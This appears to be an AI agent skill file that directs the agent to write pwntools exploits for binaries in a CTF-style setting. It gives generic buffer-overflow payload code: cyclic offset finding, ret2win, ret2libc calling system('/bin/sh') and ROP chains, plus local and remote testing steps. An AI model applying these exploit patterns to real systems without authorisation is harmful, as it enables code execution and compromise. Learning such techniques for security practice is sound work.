---
name: exploit-development
description: Develop working exploits using pwntools. Includes exploit template and common patterns.
---

# Exploit Development

Build working exploits based on vulnerability analysis.

## Exploit Development Process

1. **Start from template** - Use `templates/exploit.py`
2. **Find offset** - Use cyclic pattern
3. **Identify target** - Win function, ROP chain, shellcode
4. **Handle mitigations** - Leak addresses if needed
5. **Build payload** - Padding + control flow hijack
6. **Test locally** - With and without GDB
7. **Test remote** - Adjust for remote environment

## Stack Consistency (CRITICAL)

**Always use fixed argv[0] and empty environment:**

```python
ARGV0 = "/pwn"
ENV = {}

def conn():
    if args.GDB:
        return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
    else:
        return process([EXECUTABLE], env=ENV, argv=[ARGV0])
```

This ensures stack addresses match between normal run and GDB debug.

## Finding Offset

```python
# Generate pattern
from pwn import cyclic, cyclic_find
payload = cyclic(200)

# After crash, find offset
# In GDB: cyclic -l 0x61616168
offset = cyclic_find(0x61616168)
```

## Common Payload Patterns

### Simple ret2win
```python
payload = b'A' * offset
payload += p64(win_addr)
```

### ret2win with alignment
```python
payload = b'A' * offset
payload += p64(ret_gadget)  # 16-byte alignment
payload += p64(win_addr)
```

### ret2libc
```python
payload = b'A' * offset
payload += p64(ret_gadget)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
```

### ROP with pwntools
```python
rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()
```

## Debugging Tips

- `context.log_level = 'debug'` for verbose output
- `gdb.attach(p)` to attach to running process
- `pause()` to stop and inspect
- Print addresses: `print(f"addr: {hex(addr)}")`

## Output

Produce `exploit.py` using the template.